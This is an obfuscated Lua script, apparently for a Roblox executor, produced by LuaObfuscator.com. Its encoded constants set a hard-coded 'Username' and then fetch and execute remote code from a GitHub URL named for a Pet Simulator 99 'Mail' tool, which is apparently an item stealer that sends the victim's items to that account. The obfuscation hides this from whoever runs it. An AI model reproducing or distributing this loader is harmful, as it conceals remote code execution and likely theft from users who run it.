--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v88=v5(v81,v19);v19=nil;return v88;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=(v31/(2^(v32-((2 + 0) -1))))%((5 -3)^(((v33-((1 -0) -0)) -(v32-(2 -1))) + ((1685 -(68 + 997)) -(555 + 64)))) ;return v82-(v82%(932 -((2127 -(226 + 1044)) + 74))) ;else local v83=0;local v84;while true do if (v83==(568 -(367 + (1838 -(1523 + 114))))) then v84=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (877 -(282 + 595)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=(0 -0) -0 ;local v36;local v37;while true do if (v35==(117 -(32 + 85))) then v36,v37=v1(v16,v18,v18 + 2 + (0 -0) );v18=v18 + 1 + 1 ;v35=1;end if ((958 -(892 + 65))==v35) then return (v37 * (610 -354)) + v36 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (184 -(67 + 113)) ;return (v41 * (12302277 + 4474939)) + (v40 * ((639498 -478597) -95365)) + (v39 * ((1141 -(802 + 150)) + 67)) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=1;local v45=(v20(v43,2 -1 ,36 -16 ) * ((2 + 0)^(1029 -(915 + 82)))) + v42 ;local v46=v20(v43,59 -38 ,19 + 12 );local v47=((v20(v43,41 -9 )==(1188 -(1069 + 118))) and  -1) or (2 -1) ;if (v46==(0 -0)) then if (v45==(0 + (442 -(416 + 26)))) then return v47 * (0 -0) ;else v46=(1 + 0) -(0 -0) ;v44=0 + 0 ;end elseif (v46==(2838 -(368 + 423))) then return ((v45==(0 -0)) and (v47 * (1/0))) or (v47 * NaN) ;end return v8(v47,v46-(1041 -(10 + 8)) ) * (v44 + (v45/((7 -5)^52))) ;end local function v25(v48)local v49=438 -(145 + 293) ;local v50;local v51;while true do if (v49==(432 -(44 + 386))) then v51={};for v89=1, #v50 do v51[v89]=v2(v1(v3(v50,v89,v89)));end v49=1489 -(998 + 488) ;end if (v49==(0 + 0)) then v50=nil;if  not v48 then local v97=0;while true do if (v97==((859 -(814 + 45)) + 0)) then v48=v23();if (v48==(772 -(201 + (1406 -835)))) then return "";end break;end end end v49=1;end if ((1141 -(116 + 1022))==v49) then return v6(v51);end if (v49==((14 -10) -3)) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=7 -5 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52~=2) then else v57=nil;v58=nil;v52=3;end if (v52~=(0 + 0)) then else v53=0;v54=nil;v52=1;end if (v52~=(2 + 1)) then else v59=nil;while true do local v91=121 -(17 + 104) ;local v92;while true do if ((0 -0)~=v91) then else v92=0;while true do if (v92==0) then if (v53~=(1 + 0)) then else local v110=0;while true do if (v110~=(1 + 0)) then else for v158=1 -0 ,v58 do local v159=0;local v160;local v161;local v162;while true do if (v159==(1 -0)) then v162=nil;while true do if (v160~=(0 + 0)) then else local v175=0;while true do if (0~=v175) then else local v177=1636 -(1373 + 263) ;while true do if (v177==(1001 -(451 + 549))) then v175=1;break;end if (v177==(0 + 0)) then local v180=0;while true do if (v180~=(1 -0)) then else v177=1;break;end if (v180~=(0 -0)) then else v161=v21();v162=nil;v180=1;end end end end end if ((1385 -(746 + 638))==v175) then v160=1;break;end end end if (v160~=(1 + 0)) then else if (v161==1) then v162=v21()~=0 ;elseif (v161==(2 -0)) then v162=v24();elseif (v161==(344 -(218 + 123))) then v162=v25();end v59[v158]=v162;break;end end break;end if (v159==0) then local v167=1581 -(1535 + 46) ;while true do if (v167==1) then v159=1 + 0 ;break;end if (v167~=(0 + 0)) then else v160=560 -(306 + 254) ;v161=nil;v167=1;end end end end end v57[3]=v21();v110=2;end if ((1 + 1)==v110) then v53=3 -1 ;break;end if (v110==0) then v58=v23();v59={};v110=1468 -(899 + 568) ;end end end if (2==v53) then local v111=0 + 0 ;while true do if (v111~=1) then else return v57;end if (v111~=(0 -0)) then else local v157=603 -(268 + 335) ;while true do if (v157==1) then v111=1;break;end if (v157==0) then for v168=291 -(60 + 230) ,v23() do local v169=0;local v170;local v171;local v172;while true do if (v169~=0) then else v170=0;v171=nil;v169=573 -(426 + 146) ;end if (v169==1) then v172=nil;while true do if (v170==0) then local v178=0;local v179;while true do if ((0 + 0)~=v178) then else v179=0;while true do if (0==v179) then v171=0;v172=nil;v179=1;end if (v179==1) then v170=1457 -(282 + 1174) ;break;end end break;end end end if ((812 -(569 + 242))==v170) then while true do if (v171~=(0 -0)) then else v172=v21();if (v20(v172,1 + 0 ,1)~=(1024 -(706 + 318))) then else local v181=1251 -(721 + 530) ;local v182;local v183;local v184;local v185;local v186;while true do if (v181==1) then v184=nil;v185=nil;v181=2;end if (v181~=(1271 -(945 + 326))) then else v182=0 -0 ;v183=nil;v181=1 + 0 ;end if (2==v181) then v186=nil;while true do if (v182~=(700 -(271 + 429))) then else local v187=0 + 0 ;while true do if (v187==0) then v183=0;v184=nil;v187=1501 -(1408 + 92) ;end if (v187~=1) then else v182=1;break;end end end if (v182==1) then v185=nil;v186=nil;v182=1088 -(461 + 625) ;end if (v182==(1290 -(993 + 295))) then while true do if (v183~=(1 + 0)) then else local v188=0;local v189;local v190;while true do if (v188==(1172 -(418 + 753))) then while true do if (v189==0) then v190=0 + 0 ;while true do if (0~=v190) then else local v201=0;local v202;while true do if (v201==0) then v202=0 + 0 ;while true do if (v202==0) then v186={v22(),v22(),nil,nil};if (v184==(0 + 0)) then local v208=529 -(406 + 123) ;local v209;while true do if (0~=v208) then else v209=0;while true do if (v209~=(1769 -(1749 + 20))) then else v186[1 + 2 ]=v22();v186[1326 -(1249 + 73) ]=v22();break;end end break;end end elseif (v184==(1 + 0)) then v186[3]=v23();elseif (v184==2) then v186[3]=v23() -((1147 -(466 + 679))^(38 -22)) ;elseif (v184==3) then local v214=0;local v215;while true do if (v214~=(0 -0)) then else v215=0;while true do if ((1900 -(106 + 1794))~=v215) then else v186[1 + 2 ]=v23() -((1 + 1)^(46 -30)) ;v186[10 -6 ]=v22();break;end end break;end end end v202=115 -(4 + 110) ;end if (v202~=1) then else v190=1;break;end end break;end end end if (v190==1) then v183=586 -(57 + 527) ;break;end end break;end end break;end if (v188~=(1427 -(41 + 1386))) then else v189=103 -(17 + 86) ;v190=nil;v188=1;end end end if (2~=v183) then else local v191=0;local v192;while true do if (v191~=(0 + 0)) then else v192=0 -0 ;while true do if (v192~=(2 -1)) then else v183=3;break;end if ((166 -(122 + 44))~=v192) then else local v198=0;while true do if (v198==(1 -0)) then v192=1;break;end if (v198==0) then if (v20(v185,3 -2 ,1)==(1 + 0)) then v186[2]=v59[v186[2]];end if (v20(v185,1 + 1 ,3 -1 )==(66 -(30 + 35))) then v186[3 + 0 ]=v59[v186[3]];end v198=1;end end end end break;end end end if (v183==0) then local v193=0;local v194;while true do if (v193~=0) then else v194=1257 -(1043 + 214) ;while true do if (v194~=(0 -0)) then else local v199=1212 -(323 + 889) ;local v200;while true do if (0==v199) then v200=0 -0 ;while true do if (v200~=(580 -(361 + 219))) then else local v207=0;while true do if (v207==(321 -(53 + 267))) then v200=1 + 0 ;break;end if (v207~=0) then else v184=v20(v172,2,416 -(15 + 398) );v185=v20(v172,4,988 -(18 + 964) );v207=1;end end end if ((3 -2)==v200) then v194=1 + 0 ;break;end end break;end end end if (v194==1) then v183=1 + 0 ;break;end end break;end end end if (v183~=3) then else if (v20(v185,853 -(20 + 830) ,3 + 0 )==1) then v186[4]=v59[v186[130 -(116 + 10) ]];end v54[v168]=v186;break;end end break;end end break;end end end break;end end break;end end break;end end end for v173=1 + 0 ,v23() do v55[v173-1 ]=v28();end v157=1;end end end end end v92=739 -(542 + 196) ;end if (v92==(1 -0)) then if (v53==0) then local v112=0 + 0 ;local v113;while true do if (v112~=0) then else v113=0 + 0 ;while true do if (v113~=(1 + 0)) then else local v165=0;while true do if (0==v165) then v56={};v57={v54,v55,nil,v56};v165=406 -(118 + 287) ;end if (v165==(3 -2)) then v113=1123 -(118 + 1003) ;break;end end end if (v113~=(0 -0)) then else local v166=377 -(142 + 235) ;while true do if (v166==(0 -0)) then v54={};v55={};v166=1;end if (1~=v166) then else v113=1;break;end end end if (v113~=2) then else v53=1;break;end end break;end end end break;end end break;end end end break;end if (v52==1) then v55=nil;v56=nil;v52=1 + 1 ;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do v78=v66[v70];v79=v78[1];if (v79<=10) then if (v79<=4) then if (v79<=1) then if (v79==0) then if ((v78[3]=="_ENV") or (v78[3]=="getfenv")) then v76[v78[2]]=v62;else v76[v78[2]]=v62[v78[3]];end else v76[v78[2]]();end elseif (v79<=2) then v70=v78[3];elseif (v79>3) then v62[v78[3]]=v76[v78[2]];else local v119=v78[2];v76[v119]=v76[v119](v13(v76,v119 + 1 ,v71));end elseif (v79<=7) then if (v79<=5) then v70=v78[3];elseif (v79==6) then local v121=v78[2];local v122,v123=v69(v76[v121](v13(v76,v121 + 1 ,v78[3])));v71=(v123 + v121) -1 ;local v124=0;for v137=v121,v71 do v124=v124 + 1 ;v76[v137]=v122[v124];end else local v125=v78[2];v76[v125]=v76[v125](v13(v76,v125 + 1 ,v71));end elseif (v79<=8) then v62[v78[3]]=v76[v78[2]];elseif (v79>9) then do return;end else v76[v78[2]]=v78[3];end elseif (v79<=15) then if (v79<=12) then if (v79==11) then local v102=0;local v103;local v104;local v105;local v106;while true do if (v102==2) then for v150=v103,v71 do local v151=0;while true do if (v151==0) then v106=v106 + 1 ;v76[v150]=v104[v106];break;end end end break;end if (v102==0) then v103=v78[2];v104,v105=v69(v76[v103](v13(v76,v103 + 1 ,v78[3])));v102=1;end if (v102==1) then v71=(v105 + v103) -1 ;v106=0;v102=2;end end elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79<=13) then local v107=0;local v108;local v109;while true do if (v107==0) then v108=v78[2];v109=v76[v78[3]];v107=1;end if (v107==1) then v76[v108 + 1 ]=v109;v76[v108]=v109[v78[4]];break;end end elseif (v79==14) then v76[v78[2]]=v78[3];else for v146=v78[2],v78[3] do v76[v146]=nil;end end elseif (v79<=18) then if (v79<=16) then v76[v78[2]]();elseif (v79==17) then if ((v78[3]=="_ENV") or (v78[3]=="getfenv")) then v76[v78[2]]=v62;else v76[v78[2]]=v62[v78[3]];end else for v148=v78[2],v78[3] do v76[v148]=nil;end end elseif (v79<=19) then do return;end elseif (v79==20) then local v132=v78[2];local v133=v76[v78[3]];v76[v132 + 1 ]=v133;v76[v132]=v133[v78[4]];elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end v70=v70 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030A3O0053747261774E61486174030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012093O00014O000F000100013O0026153O0002000100010004053O00020001001209000100013O00261500010005000100010004053O00050001001209000200033O001208000200023O00122O000200043O00122O000300053O002014000300030006001209000500074O000B000300054O000700023O00022O00010002000100010004053O001400010004053O000500010004053O001400010004053O000200012O000A3O00017O00",v9(),...);
